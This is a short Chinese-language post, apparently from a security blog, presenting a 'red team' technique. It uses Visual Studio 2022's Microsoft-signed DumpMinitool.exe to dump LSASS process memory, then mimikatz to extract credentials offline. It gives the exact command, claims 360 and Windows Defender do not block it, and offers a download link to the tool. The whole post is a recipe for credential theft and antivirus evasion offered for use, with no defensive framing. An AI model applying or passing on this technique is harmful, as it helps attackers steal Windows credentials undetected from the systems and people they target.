红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具
VSole2022-07-01 06:10:41
可以自行安装Visual Studio2022,然后访问路径,把工具拖出来使用即可,也可以直接在文末获取下载地址
转储 LSASS,该工具文件路径:
C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
文件名:DumpMinitool.exe
参数区分大小写
使用命令:
DumpMinitool.exe --file dump.txt --processId xxx --dumpType Full --file 输出的路径 --processId lsass.exe进程的ID --dumpType 方式
查看lsass进程ID
dump完成后,再使用mimikatz进行离线解密即可
mimikatz
微软的数字签名
免杀测试:360和Win10自带的defender杀软均不拦截。
沙箱检测
微步在线
下载地址:
链接:https://pan.baidu.com/s/18IRSjJaM4d2fwjmK9zfQFg
提取码:tfz4
VSole
网络安全专家